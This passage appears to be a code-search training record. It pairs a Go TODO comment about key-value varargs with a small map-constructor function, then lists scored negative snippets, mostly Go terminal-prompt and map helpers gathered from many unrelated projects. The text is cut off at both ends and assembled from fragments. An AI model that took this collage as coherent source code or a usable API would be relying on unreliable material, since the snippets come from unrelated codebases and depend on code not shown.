Input(prompt string) string {\n\ttext, err := InputWithError(prompt)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\treturn text\n}", "func ReadString(prompt string) string {\n\tfmt.Printf(\"%s: \", prompt)\n\tr := bufio.NewReader(os.Stdin)\n\tstr, _ := r.ReadString('\\n')\n\treturn strings.TrimSpace(str)\n}", "func Prompt() {\n\tcurrDir := strings.Trim(commands.CurrentWD(), \"\\n\")\n\tfmt.Printf(\"%v $: \", currDir)\n}", "func Choose(pr string, options []string) int {\n\treturn defaultPrompter.Choose(pr, options)\n}", "func ReadLine(prompt string) (line string, err error) {\n\n\tfmt.Print(prompt)\n\n\tin := bufio.NewReader(os.Stdin)\n\n\tline, err = in.ReadString('\\n')\n\tif err != nil {\n\t\terr = ErrInterrupted\n\t} else if len(line) > 0 {\n\t\t// need to take the end of line back off\n\t\t// using scanner didn't register ctrl-c properly\n\t\tline = strings.TrimRight(line, \"\\n\\r\")\n\t}\n\treturn\n\n}", "func promptString(label string, validation func(i string) error) (input string, err error) {\n\tprompt := survey.Input{\n\t\tMessage: label,\n\t}\n\tvar res string\n\tif err := survey.AskOne(&prompt, &res); err != nil {\n\t\treturn \"\", err\n\t}\n\treturn res, nil\n}", "func Ask(prompt string) (password string, err error) {\n\treturn FAsk(os.Stdout, prompt)\n}", "func ReadConsole(prompt string) (string, error) {\n\tif prompt != \"\" {\n\t\tfmt.Print(prompt + \": \")\n\t}\n\n\treader := bufio.NewReader(os.Stdin)\n\traw, err := reader.ReadString('\\n')\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\treturn RemoveTralingNewline(raw), nil\n}", "func PromptForSecret(msg string) (string, error) {\n\tfmt.Print(msg)\n\n\tvar resp string\n\tif _, err := ScanlnNoEcho(&resp); err != nil {\n\t\treturn \"\", err\n\t}\n\n\t// Print new line after prompt since new line wasn't echoed\n\tfmt.Println()\n\n\treturn resp, nil\n}", "func InteractiveInput(prompt string) string {\n\tif prompt != \"\" {\n\t\tfmt.Printf(\"%s \", prompt)\n\t}\n\tinput, err := bufio.NewReader(os.Stdin).ReadString('\\n')\n\tCheck(err)\n\n\t// sanitize input\n\treturn SanitizeInput(input)\n}", "func AskSelection(question string, options []string) (int, bool) {\n\tfmt.Fprintln(Out, question)\n\tfor i, v := range options {\n\t\tfmt.Fprintf(Out, \" [%d] %s\\n\", i, v)\n\t}\n\n\tintAns, err := strconv.Atoi(prompt())\n\tif err != nil || intAns < 0 || intAns > len(options)-1 {\n\t\tfmt.Fprintf(Out, \"Invalid input. Can only be between 0-%d\\n\", len(options)-1)\n\t\treturn 0, false\n\t}\n\n\treturn intAns, true\n}", "func (p *Prompt) Select(text string, list []string, opts *SelectOptions) (string, int, error) {\n\tif len(list) == 0 {\n\t\treturn \"\", 0, errors.New(\"list must be greater than 0\")\n\t}\n\n\tformat := p.fmtSelectOptions(opts)\n\n\tvar selectedIndex int\n\tvar selectedText string\n\n\t// print the list before the prompt to\n\t// provide clear options\n\tfor i, l := range list {\n\t\tf := \" %d - %s\\n\"\n\t\tif i == len(list)-1 {\n\t\t\tf = \" %d - %s\\n\"\n\t\t}\n\n\t\t_, err := p.Writer.Write([]byte(fmt.Sprintf(f, i+1, l)))\n\t\tif err != nil {\n\t\t\treturn \"\", 0, err\n\t\t}\n\t}\n\n\tresp, err := p.read(text, format)\n\tif err != nil {\n\t\treturn \"\", 0, err\n\t}\n\n\tif resp == \"\" && opts.Default != 0 {\n\t\t// minus 1 to account for zero index\n\t\tresp = strconv.Itoa(opts.Default - 1)\n\t} else {\n\t\t// convert resp to string\n\t\te, err := strconv.Atoi(resp)\n\t\tif err != nil {\n\t\t\treturn \"\", 0, err\n\t\t}\n\n\t\t// make sure its a valid option before we minus one\n\t\tif len(list) < e {\n\t\t\treturn \"\", 0, errors.New(\"invalid option provided\")\n\t\t}\n\n\t\t// minus one\n\t\tresp = strconv.Itoa(e - 1)\n\t}\n\n\tselectedIndex, err = strconv.Atoi(resp)\n\tif err != nil {\n\t\treturn \"\", 0, err\n\t}\n\n\tselectedText = list[selectedIndex]\n\n\treturn selectedText, selectedIndex, nil\n}", "func (c *Config) readChoice(prompt string, choices []string, defaultValue *string) (string, error) {\n\tswitch {\n\tcase c.noTTY:\n\t\tfullPrompt := prompt + \" (\" + strings.Join(choices, \"/\")\n\t\tif defaultValue != nil {\n\t\t\tfullPrompt += \", default \" + *defaultValue\n\t\t}\n\t\tfullPrompt += \")? \"\n\t\tabbreviations := chezmoi.UniqueAbbreviations(choices)\n\t\tfor {\n\t\t\tvalue, err := c.readLineRaw(fullPrompt)\n\t\t\tif err != nil {\n\t\t\t\treturn \"\", err\n\t\t\t}\n\t\t\tif value == \"\" && defaultValue != nil {\n\t\t\t\treturn *defaultValue, nil\n\t\t\t}\n\t\t\tif value, ok := abbreviations[value]; ok {\n\t\t\t\treturn value, nil\n\t\t\t}\n\t\t}\n\tdefault:\n\t\tinitModel := chezmoibubbles.NewChoiceInputModel(prompt, choices, defaultValue)\n\t\tfinalModel, err := runCancelableModel(initModel)\n\t\tif err != nil {\n\t\t\treturn \"\", err\n\t\t}\n\t\treturn finalModel.Value(), nil\n\t}\n}", "func promptType(question string, details string) (t string) {\n\tfor {\n\t\tt = promptString(question, details)\n\t\tt = strings.TrimSpace(t)\n\t\tswitch t {\n\t\tcase dep.TypeBzr, dep.TypeGit, dep.TypeHg, dep.TypeGitClone:\n\t\t\treturn\n\t\tdefault:\n\t\t\tutil.Print(colors.Red(\"Invalid Type, try again...\"))\n\t\t}\n\t}\n}", "func PrintPrompt(g *gocui.Gui) {\n\tpromptString := \"[w,a,s,d,e,?] >>\"\n\n\tg.Update(func(g *gocui.Gui) error {\n\t\tv, err := g.View(Prompt)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tv.Clear()\n\t\tv.MoveCursor(0, 0, true)\n\n\t\tif consecutiveError == 0 {\n\t\t\tfmt.Fprintf(v, color.Green(color.Regular, promptString))\n\t\t} else {\n\t\t\tfmt.Fprintf(v, color.Red(color.Regular, promptString))\n\t\t}\n\t\treturn nil\n\t})\n}", "func (pin *Pinentry) Get(prompt string) (string, error) {\n\tcmd := exec.Command(pin.path)\n\tstdin, err := cmd.StdinPipe()\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tstdout, err := cmd.StdoutPipe()\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\terr = cmd.Start()\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tbufferReader := bufio.NewReader(stdout)\n\tlineBytes, _, err := bufferReader.ReadLine()\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tline := string(lineBytes)\n\tif !strings.HasPrefix(line, \"OK\") {\n\t\treturn \"\", fmt.Errorf(\"failed to initialize pinentry, got response: %v\", line)\n\t}\n\n\tterminal := os.Getenv(\"TERM\")\n\tif len(terminal) > 0 {\n\t\tif ok := setOption(stdin, bufferReader, fmt.Sprintf(\"OPTION ttytype=%s\\n\", terminal)); !ok {\n\t\t\treturn \"\", fmt.Errorf(\"failed to set ttytype\")\n\t\t}\n\t}\n\n\tif ok := setOption(stdin, bufferReader, fmt.Sprintf(\"OPTION ttyname=%v\\n\", tty)); !ok {\n\t\treturn \"\", fmt.Errorf(\"failed to set ttyname\")\n\t}\n\n\tif ok := setOption(stdin, bufferReader, \"SETPROMPT PIN:\\n\"); !ok {\n\t\treturn \"\", fmt.Errorf(\"failed to set prompt\")\n\t}\n\tif ok := setOption(stdin, bufferReader, \"SETTITLE smimesign\\n\"); !ok {\n\t\treturn \"\", fmt.Errorf(\"failed to set title\")\n\t}\n\tif ok := setOption(stdin, bufferReader, fmt.Sprintf(\"SETDESC %s\\n\", prompt)); !ok {\n\t\treturn \"\", fmt.Errorf(\"failed to set description\")\n\t}\n\n\t_, err = fmt.Fprint(stdin, \"GETPIN\\n\")\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tlineBytes, _, err = bufferReader.ReadLine()\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tline = string(lineBytes)\n\n\t_, err = fmt.Fprint(stdin, \"BYE\\n\")\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tif err = cmd.Wait(); err != nil {\n\t\treturn \"\", err\n\t}\n\n\tif !strings.HasPrefix(line, \"D \") {\n\t\treturn \"\", fmt.Errorf(line)\n\t}\n\n\treturn strings.TrimPrefix(line, \"D \"), nil\n}", "func (p *Prompt) GetInput(msg string) (string, error) {\n\tfmt.Fprintln(p.out, msg)\n\tfmt.Fprint(p.out, \"-> \")\n\tp.out.Flush()\n\ttext, err := p.in.ReadString('\\n')\n\treturn strings.TrimSpace(text), err\n}", "func String(pr string, defaultValue string) string {\n\treturn defaultPrompter.String(pr, defaultValue)\n}", "func (module *Crawler) Prompt(what string) {\n}", "func (t Terminal) Read(prompt string) (string, error) {\n\tif prompt != \"\" {\n\t\tfmt.Fprintf(t.Output, \"%s \", prompt)\n\t}\n\n\treader := bufio.NewReader(t.Input)\n\n\ttext, readErr := reader.ReadString('\\n')\n\tif readErr != nil {\n\t\treturn \"\", readErr\n\t}\n\n\ttext = strings.TrimSpace(text)\n\n\treturn text, nil\n}", "func (s Style) PromptString(str string) string {\n\treturn fmt.Sprintf(\"%s%s%s\", s.PromptEscape(), str, Reset.PromptEscape())\n}", "func (l *Linenoise) Read(prompt, init string) (string, error) {\n\tif !isatty.IsTerminal(uintptr(syscall.Stdin)) {\n\t\t// Not a tty, read from a file or pipe.\n\t\treturn l.readBasic()\n\t} else if unsupportedTerm() {\n\t\t// Not a terminal we know about, so basic line reading.\n\t\tfmt.Printf(prompt)\n\t\ts, err := l.readBasic()\n\t\tif err == ErrQuit {\n\t\t\tfmt.Printf(\"\\n\")\n\t\t}\n\t\treturn s, err\n\t} else {\n\t\t// A command line on stdin, our raison d'etre.\n\t\treturn l.readRaw(prompt, init)\n\t}\n}", "func (s *promptString) promptString() error {\n\tprompt := promptui.Prompt{\n\t\tLabel: s.label,\n\t\tDefault: s.defaultValue,\n\t}\n\n\tswitch s.validation {\n\tcase \"email\":\n\t\tprompt.Validate = validateEmailInput\n\tcase \"no-spaces-and-no-uppercase\":\n\t\tprompt.Validate = validateWhiteSpacesAndUpperCase\n\tcase \"url\":\n\t\tprompt.Validate = validateURL\n\tdefault:\n\t\tprompt.Validate = validateEmptyInput\n\t}\n\n\tresult, err := prompt.Run()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\ts.value = result\n\treturn nil\n}", "func Prompt(s string) rune {\n\tacceptedRunes := \"\"\n\n\t// show parentheticals in bold\n\tline := make([]segment, 0)\n\tpos := 0\n\tfor pos < len(s) {\n\t\topen := strings.IndexRune(s[pos:], '(')\n\t\tif open == -1 {\n\t\t\tline = append(line, segment{text: s[pos:]})\n\t\t\tbreak\n\t\t} else {\n\t\t\tclose := strings.IndexRune(s[pos+open:], ')')\n\t\t\tif close == -1 {\n\t\t\t\tline = append(line, segment{text: s[pos:]})\n\t\t\t\tbreak\n\t\t\t} else {\n\t\t\t\tline = append(line, segment{text: s[pos : pos+open]})\n\t\t\t\tline = append(line, segment{\n\t\t\t\t\ttext: s[pos+open : pos+open+close+1],\n\t\t\t\t\tfg: colorDefault | bold,\n\t\t\t\t})\n\t\t\t\tacceptedRunes += s[pos+open+1 : pos+open+close]\n\t\t\t\tpos += open + close + 1\n\t\t\t}\n\t\t}\n\t}\n\n\t// add space before cursor\n\tline = append(line, segment{text: \" \"})\n\n\t// wait for and return a valid rune\n\twrite <- line\n\tchange <- modePrompt\n\tfor {\n\t\tch := <-prompt\n\t\tif strings.ContainsRune(acceptedRunes, ch) {\n\t\t\trewrite <- append(line, segment{text: string(ch)})\n\t\t\tchange <- modeWorking\n\t\t\treturn ch\n\t\t}\n\t}\n}", "func Prompt(question string, validators ...ValidatorFunction) (out interface{}) {\n\tfor {\n\t\tfmt.Printf(\"[?] %s: \", question)\n\n\t\tinput, err := getInput()\n\t\tif err != nil {\n\t\t\tlog.Fatal(err)\n\t\t}\n\n\t\tvar validatorError error\n\t\tfor _, validator := range validators {\n\t\t\tout, err = validator(input)\n\t\t\tif err != nil {\n\t\t\t\tvalidatorError = err\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\n\t\tif validatorError == nil {\n\t\t\tbreak\n\t\t}\n\n\t\tfmt.Printf(\"[!] Error: %s\\n\", validatorError.Error())\n\t}\n\treturn\n}", "func (p *Player) prompt() {\n\t// TODO: standard/custom prompts\n\tp.writer.Write([]byte(\">\"))\n}", "func (dbg *Debug) GetPrompt(name string) string {\n\thi := dbg.GetCurrentHart()\n\tstate := []rune{'h', 'r'}[util.BoolToInt(hi.State == rv.Running)]\n\treturn fmt.Sprintf(\"%s.%d%c> \", name, hi.ID, state)\n}", "func (c *MetaConfig) GetInput(prompt string, compFunc func(s string) bool, comps ...string) string {\n\tc.WriteString(prompt + \"\\n\")\n\tc.Scan()\n\n\tif compFunc != nil {\n\t\tif !compFunc(c.Text()) {\n\t\t\treturn c.GetInput(prompt, compFunc)\n\t\t}\n\t\treturn c.Text()\n\t}\n\n\tif !StringComp(c.Text(), comps...) {\n\t\treturn c.GetInput(prompt, nil, comps...)\n\t}\n\treturn c.Text()\n}", "func askInput(message string, response interface{}) error {\n\treturn survey.AskOne(&survey.Input{Message: message}, response, survey.MinLength(1))\n}", "func promptForUserInput() (data.CollectionMetadata, data.UserPreferences, error) {\n\t// TODO try to get the user name and email from the git config first before asking for it\n\treader := bufio.NewReader(os.Stdin)\n\tmeta := data.CollectionMetadata{}\n\tu := data.UserPreferences{}\n\n\tusername, err := user.Current()\n\tif err != nil {\n\t\tfmt.Print(\"Could not determine current user\")\n\t\tos.Exit(1)\n\t}\n\n\thost, hostErr := os.Hostname()\n\tif hostErr != nil {\n\t\tfmt.Print(\"Could not determine hostname\")\n\t\tos.Exit(1)\n\t}\n\n\tuid, uuidErr := uuid.NewV4()\n\tif uuidErr != nil {\n\t\tfmt.Print(\"Could not generate project identifier\")\n\t\tos.Exit(1)\n\t}\n\n\t// default values\n\tmeta.Collection = \"Bibliography\"\n\tmeta.Description = \"Project bibliography.\"\n\tmeta.Id = uid.String()\n\tmeta.Owner = username.Username + \"@\" + host\n\tmeta.Created = time.Now().UTC().Format(time.RFC3339)\n\tmeta.Modified = time.Now().UTC().Format(time.RFC3339)\n\n\t// override defaults with user specified values\n\tfmt.Print(ansi.Color(\" Project or collection name: (Bibliography) \", \"blue\"))\n\tname, _ := reader.ReadString('\\n')\n\n\tfmt.Print(ansi.Color(\" Description: (Project bibliography.) \", \"blue\"))\n\tdesc, _ := reader.ReadString('\\n')\n\n\tfmt.Print(ansi.Color(\" Owner: (\" + username.Username + \") \", \"blue\"))\n\towner, _ := reader.ReadString('\\n')\n\n\tmeta.Collection = name\n\tmeta.Description = desc\n\tmeta.Owner = owner\n\n\tfmt.Print(ansi.Color(\" Email: (\" + username.Username + \"@\" + host + \") \", \"blue\"))\n\temail, err := reader.ReadString('\\n')\n\tif err != nil {\n\t\treturn meta, u, err\n\t}\n\n\tu.Fullname = strings.Trim(owner, \"\\n\")\n\tu.Email = strings.Trim(email, \"\\n\")\n\n\treturn meta, u, nil\n}", "func AskForDefaultTeam(username string, token string, org string) int {\n\tteams := ListOrgTeams(username, token, org)\n\tfmt.Printf(\"%v\", teams)\n\tfmt.Println(\"Which team would you want as default? (this option can be overridden in individual calls)\")\n\tPrintTable([]string{\"TeamId\", \"TeamName\"}, pivotTeamList(teams))\n\tteam := getInt(\"Team ID (number): \")\n\tif !intInSlice(team, teamSliceToIntSlice(teams)) {\n\t\tlog.Fatalln(\"input not in available options\")\n\t}\n\treturn team\n}" ]
[ "0.67208904", "0.6344035", "0.6259892", "0.62460095", "0.6184595", "0.6145198", "0.6137686", "0.6094732", "0.6065367", "0.604232", "0.59828156", "0.59640247", "0.59612864", "0.5935014", "0.5933619", "0.59018624", "0.5896817", "0.5866267", "0.58331585", "0.5828249", "0.5823301", "0.57945883", "0.5781319", "0.5756633", "0.5751212", "0.56929696", "0.5665811", "0.56319827", "0.561608", "0.56113863", "0.56079197", "0.5603894", "0.55998755", "0.5576329", "0.55387545", "0.5535049", "0.55326176", "0.552957", "0.5525754", "0.55094594", "0.55051553", "0.54715806", "0.5447509", "0.5447493", "0.54320943", "0.54299206", "0.5415318", "0.53773135", "0.53546536", "0.5352462", "0.5341235", "0.5339432", "0.5327807", "0.5325835", "0.5322486", "0.5311241", "0.53081006", "0.52956784", "0.5273037", "0.52675575", "0.52651644", "0.5255904", "0.5246802", "0.5233655", "0.5226799", "0.522128", "0.5217098", "0.52168673", "0.5203005", "0.518544", "0.5181289", "0.517813", "0.517774", "0.51735544", "0.5154727", "0.51516294", "0.5143121", "0.5132666", "0.51165414", "0.51124185", "0.5102107", "0.5080684", "0.50705326", "0.5054862", "0.50491893", "0.504891", "0.5047254", "0.50419444", "0.5041258", "0.5029441", "0.50220644", "0.502137", "0.501031", "0.49983272", "0.4992761", "0.49767196", "0.49762955", "0.4971655", "0.4969285", "0.49628133" ]
0.76892096
0
TODO: accept varargs of k v k v k v ...
func newMap() map[interface{}]interface{} { return map[interface{}]interface{}{} }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func hasKey(iv interface{}, key string, ret *[]interface{}) {\n\tswitch iv.(type) {\n\tcase map[string]interface{}:\n\t\tvv := iv.(map[string]interface{})\n\t\tif v, ok := vv[key]; ok {\n\t\t\t*ret = append(*ret, v)\n\t\t}\n\t\tfor _, v := range iv.(map[string]interface{}) {\n\t\t\thasKey(v, key, ret)\n\t\t}\n\tcase []interface{}:\n\t\tfor _, v := range iv.([]interface{}) {\n\t\t\thasKey(v, key, ret)\n\t\t}\n\t}\n}", "func (s KernelArgs) Extend(k KernelArgs) {\n\tfor a, b := range k {\n\t\ts[a] = b\n\t}\n}", "func ParseVariadicArguments(\n\tresult map[string][]string, // provided result map\n\tmultKeys []string, // keys that may appear multiple times\n\tuniqKeys []string, // keys that are allowed at most once\n\treqKeys []string, // keys that are required at least one\n\targs []string, // arguments to parse\n) error {\n\t// used to hold found errors, so if three keywords are missing they can\n\t// all be mentioned in one call\n\terrors := []string{}\n\n\t// merge key slices\n\tkeys := append(multKeys, uniqKeys...)\n\n\t// helper to skip over next value in args slice\n\tskip := false\n\n\tfor pos, val := range args {\n\t\t// skip current arg if last argument was a keyword\n\t\tif skip {\n\t\t\tskip = false\n\t\t\tcontinue\n\t\t}\n\n\t\tif sliceContainsString(val, keys) {\n\t\t\t// there must be at least one arguments left\n\t\t\tif len(args[pos+1:]) < 1 {\n\t\t\t\terrors = append(errors,\n\t\t\t\t\t`Syntax error, incomplete key/value specification (too few items left to parse)`,\n\t\t\t\t)\n\t\t\t\tgoto abort\n\t\t\t}\n\t\t\t// check for back-to-back keyswords\n\t\t\tif err := checkStringNotAKeyword(args[pos+1], keys); err != nil {\n\t\t\t\terrors = append(errors, err.Error())\n\t\t\t\tgoto abort\n\t\t\t}\n\n\t\t\t// append value of current keyword into result map\n\t\t\tresult[val] = append(result[val], args[pos+1])\n\t\t\tskip = true\n\t\t\tcontinue\n\t\t}\n\t\t// keywords trigger continue before this\n\t\t// values after keywords are skip'ed\n\t\t// reaching this is an error\n\t\terrors = append(errors, fmt.Sprintf(\"Syntax error, erroneus argument: %s\", val))\n\t}\n\n\t// check if we managed to collect all required keywords\n\tfor _, key := range reqKeys {\n\t\t// ok is false if slice is nil\n\t\tif _, ok := result[key]; !ok {\n\t\t\terrors = append(errors, fmt.Sprintf(\"Syntax error, missing keyword: %s\", key))\n\t\t}\n\t}\n\n\t// check if unique keywords were only specified once\n\tfor _, key := range uniqKeys {\n\t\tif sl, ok := result[key]; ok && (len(sl) > 1) {\n\t\t\terrors = append(errors, fmt.Sprintf(\"Syntax error, keyword must only be provided once: %s\", key))\n\t\t}\n\t}\n\nabort:\n\tif len(errors) > 0 {\n\t\tresult = nil\n\t\treturn fmt.Errorf(combineStrings(errors...))\n\t}\n\n\treturn nil\n}", "func putArgs(key, value string) (*PutRequest, *PutResponse) {\n\targs := &PutRequest{\n\t\tRequestHeader: RequestHeader{\n\t\t\tKey: []byte(key),\n\t\t\tReplica: Replica{RangeID: 1},\n\t\t},\n\t\tValue: Value{\n\t\t\tBytes: []byte(value),\n\t\t},\n\t}\n\treply := &PutResponse{}\n\treturn args, reply\n}", "func (r *RedisSession) prepareArgsWithKey(key string, rest ...interface{}) []interface{} {\n\tprefixedReq := make([]interface{}, len(rest)+1)\n\n\t// prepend prefixed key\n\tprefixedReq[0] = r.AddPrefix(key)\n\n\tfor key, el := range rest {\n\t\tprefixedReq[key+1] = el\n\t}\n\n\treturn prefixedReq\n}", "func keys(f func(reflect.Value, ctx) error) func(reflect.Value, ctx) error {\n\treturn func(v reflect.Value, c ctx) error {\n\t\tif v.Kind() != reflect.Map {\n\t\t\treturn fmt.Errorf(\"keys validator used on %s; only allowed on maps\", v.Type())\n\t\t}\n\t\tfor _, vk := range v.MapKeys() {\n\t\t\tc := c.enterKey(vk)\n\t\t\tif err := c.validateInterface(vk); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif err := f(vk, c); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t\treturn nil\n\t}\n}", "func complexKeys(m map[string]map[string]string) []string {\n\tvar keys []string\n\tfor k := range m {\n\t\tkeys = append(keys, k)\n\t}\n\treturn keys\n}", "func Keys[K comparable, V any](in map[K]V) []K {\n\tresult := make([]K, 0, len(in))\n\n\tfor k := range in {\n\t\tresult = append(result, k)\n\t}\n\n\treturn result\n}", "func isKeysValid(keyValues []ast.Expr, fun ast.Expr, pass *analysis.Pass, funName string) {\n\tif len(keyValues)%2 != 0 {\n\t\tpass.Report(analysis.Diagnostic{\n\t\t\tPos: fun.Pos(),\n\t\t\tMessage: fmt.Sprintf(\"Additional arguments to %s should always be Key Value pairs. Please check if there is any key or value missing.\", funName),\n\t\t})\n\t\treturn\n\t}\n\n\tfor index, arg := range keyValues {\n\t\tif index%2 != 0 {\n\t\t\tcontinue\n\t\t}\n\t\tlit, ok := arg.(*ast.BasicLit)\n\t\tif !ok {\n\t\t\tpass.Report(analysis.Diagnostic{\n\t\t\t\tPos: fun.Pos(),\n\t\t\t\tMessage: fmt.Sprintf(\"Key positional arguments are expected to be inlined constant strings. Please replace %v provided with string value\", arg),\n\t\t\t})\n\t\t\tcontinue\n\t\t}\n\t\tif lit.Kind != token.STRING {\n\t\t\tpass.Report(analysis.Diagnostic{\n\t\t\t\tPos: fun.Pos(),\n\t\t\t\tMessage: fmt.Sprintf(\"Key positional arguments are expected to be inlined constant strings. Please replace %v provided with string value\", lit.Value),\n\t\t\t})\n\t\t\tcontinue\n\t\t}\n\t\tisASCII := utf8string.NewString(lit.Value).IsASCII()\n\t\tif !isASCII {\n\t\t\tpass.Report(analysis.Diagnostic{\n\t\t\t\tPos: fun.Pos(),\n\t\t\t\tMessage: fmt.Sprintf(\"Key positional arguments %s are expected to be lowerCamelCase alphanumeric strings. Please remove any non-Latin characters.\", lit.Value),\n\t\t\t})\n\t\t}\n\t}\n}", "func Keys[K comparable, V any](m map[K]V) []K {\n\tr := make([]K, 0, len(m))\n\tfor k := range m {\n\t\tr = append(r, k)\n\t}\n\treturn r\n}", "func ParamsFromKV(keyValues ...string) Params {\n\tres := make(map[string]*Param, len(keyValues)/2)\n\n\tfor i := 0; i < len(keyValues)-1; i += 2 {\n\t\tif i+1 >= len(keyValues) {\n\t\t\t// the last missing value is ignored\n\t\t\tcontinue\n\t\t}\n\n\t\tk := keyValues[i]\n\t\tv := keyValues[i+1]\n\t\tres[k] = &Param{\n\t\t\tName: k,\n\t\t\tValue: v,\n\t\t}\n\t}\n\n\treturn res\n}", "func printKeysAndValues(l *log.Logger, keysAndValues ...interface{}) {\n\tfor i := 0; i < len(keysAndValues)/2; i += 2 {\n\t\tl.Printf(\"\\t%s = %s\\n\", keysAndValues[i], keysAndValues[i+1])\n\t}\n}", "func vkeyAppend(v []string, k string) []string {\n\tfor _, z := range v {\n\t\tif z == k {\n\t\t\treturn v\n\t\t}\n\t}\n\treturn append(v, k)\n}", "func buildKeyValueFields(field *surface_v1.Field) []*dpb.FieldDescriptorProto {\n\tk, v := \"key\", \"value\"\n\tvar n1, n2 int32 = 1, 2\n\tl := dpb.FieldDescriptorProto_LABEL_OPTIONAL\n\tt := dpb.FieldDescriptorProto_TYPE_STRING\n\tkeyField := &dpb.FieldDescriptorProto{\n\t\tName: &k,\n\t\tNumber: &n1,\n\t\tLabel: &l,\n\t\tType: &t,\n\t}\n\n\tvalueType := field.NativeType[11:] // This transforms a string like 'map[string]int32' to 'int32'. In other words: the type of the value from the map.\n\tvalueField := &dpb.FieldDescriptorProto{\n\t\tName: &v,\n\t\tNumber: &n2,\n\t\tLabel: &l,\n\t\tType: getFieldDescriptorType(valueType, field.EnumValues),\n\t\tTypeName: getTypeNameForMapValueType(valueType),\n\t}\n\treturn []*dpb.FieldDescriptorProto{keyField, valueField}\n}", "func KvFn(k string, v int) (string, int) {\n\treturn k, v\n}", "func getArgs(key string) (*GetRequest, *GetResponse) {\n\targs := &GetRequest{\n\t\tRequestHeader: RequestHeader{\n\t\t\tKey: []byte(key),\n\t\t\tReplica: Replica{RangeID: 1},\n\t\t},\n\t}\n\treply := &GetResponse{}\n\treturn args, reply\n}", "func expandKeyTestingOptionsMap(c *Client, f map[string]KeyTestingOptions, res *Key) (map[string]interface{}, error) {\n\tif f == nil {\n\t\treturn nil, nil\n\t}\n\n\titems := make(map[string]interface{})\n\tfor k, item := range f {\n\t\ti, err := expandKeyTestingOptions(c, &item, res)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif i != nil {\n\t\t\titems[k] = i\n\t\t}\n\t}\n\n\treturn items, nil\n}", "func mapKeyArg(fast int, n, key ir.Node) ir.Node {\n\tswitch fast {\n\tcase mapslow:\n\t\t// standard version takes key by reference.\n\t\t// order.expr made sure key is addressable.\n\t\treturn typecheck.NodAddr(key)\n\tcase mapfast32ptr:\n\t\t// mapaccess and mapdelete don't distinguish pointer vs. integer key.\n\t\treturn ir.NewConvExpr(n.Pos(), ir.OCONVNOP, types.Types[types.TUINT32], key)\n\tcase mapfast64ptr:\n\t\t// mapaccess and mapdelete don't distinguish pointer vs. integer key.\n\t\treturn ir.NewConvExpr(n.Pos(), ir.OCONVNOP, types.Types[types.TUINT64], key)\n\tdefault:\n\t\t// fast version takes key by value.\n\t\treturn key\n\t}\n}", "func (v *Value) keys(params ...interface{}) (interface{}, error) {\n\tif len(params) != 0 {\n\t\treturn nil, newParamLenErr(len(params), 0)\n\t}\n\n\ti := 0\n\tout := make([]string, len(*v))\n\tfor key := range *v {\n\t\tout[i] = key\n\t\ti++\n\t}\n\treturn out, nil\n}", "func getSliceData[K comparable, V any](m map[K]V) []Data[K, V] {\n\t// define a slice with Data type passing K, V type parameters\n\td := make([]Data[K, V], len(m))\n\ti := 0\n\tfor k, v := range m {\n\t\t// creating value of generic type of Data\n\t\tnewData := Data[K, V]{}\n\t\tnewData.Key = k\n\t\tnewData.Value = v\n\t\td[i] = newData\n\t\ti++\n\t}\n\treturn d\n}", "func possibleSubKeys(keyPath string, cfg *yaml.Tree) (list []string, err error) {\n\tvar value *yaml.Tree\n\tvar query string\n\n\tif keyPath != \"\" {\n\t\tparentPath := strings.Split(keyPath, \".\")\n\t\tif len(parentPath) > 0 {\n\t\t\t// offer suggestions based on this query\n\t\t\tquery = parentPath[len(parentPath)-1]\n\t\t\tif _, err := strconv.Atoi(query); err != nil {\n\t\t\t\tparentPath = parentPath[:len(parentPath)-1]\n\t\t\t}\n\t\t\tlog.Debugf(\"Querying for %s in %s\", query, parentPath)\n\t\t}\n\n\t\tif len(parentPath) > 0 {\n\t\t\terr = cfg.Get(strings.Join(parentPath, \".\"), &value)\n\t\t\tif err != nil {\n\t\t\t\treturn nil, err\n\t\t\t}\n\t\t} else {\n\n\t\t\tvalue = cfg\n\t\t}\n\t} else {\n\t\tvalue = cfg\n\t}\n\n\tlog.Debugf(\"Query: %s\", query)\n\tif value.IsSlice() {\n\t\ttheList := make([]interface{}, 0)\n\t\tif err = value.Decode(&theList); err != nil {\n\t\t\treturn\n\t\t}\n\n\t\tfor keyInt, value := range theList {\n\t\t\tkey := mappedKey(strconv.Itoa(keyInt), value)\n\t\t\tlist = append(list, key)\n\t\t}\n\t} else if value.IsMap() {\n\t\ttheMap := map[string]interface{}{}\n\t\tif err = value.Decode(&theMap); err != nil {\n\t\t\treturn\n\t\t}\n\t\tfor key, value := range theMap {\n\t\t\tif query != \"\" && !strings.HasPrefix(strings.ToLower(key), strings.ToLower(query)) {\n\t\t\t\tlog.Debugf(\"Skipping %s\", key)\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tkey = mappedKey(key, value)\n\t\t\tlist = append(list, key)\n\t\t}\n\t}\n\n\tsort.Strings(list)\n\treturn\n}", "func getVKParams(rawValues url.Values) string {\n\tvkPrefix := make(url.Values)\n\n\tfor key, values := range rawValues {\n\t\tif strings.HasPrefix(key, \"vk_\") {\n\t\t\tfor _, value := range values {\n\t\t\t\tvkPrefix.Add(key, value)\n\t\t\t}\n\t\t}\n\t}\n\n\treturn vkPrefix.Encode() // sorted by key.\n}", "func getkey(key ...interface{}) interface{} {\n\tif len(key) > 0 {\n\t\treturn key[0]\n\t}\n\n\treturn nil\n}", "func mapKeys[K comparable, V any](m map[K]V) []K {\n\tks := make([]K, 0, len(m))\n\tfor k := range m {\n\t\tks = append(ks, k)\n\t}\n\treturn ks\n}", "func GetViewByMultipleKeys(viewObject string, viewname string, keys []string, 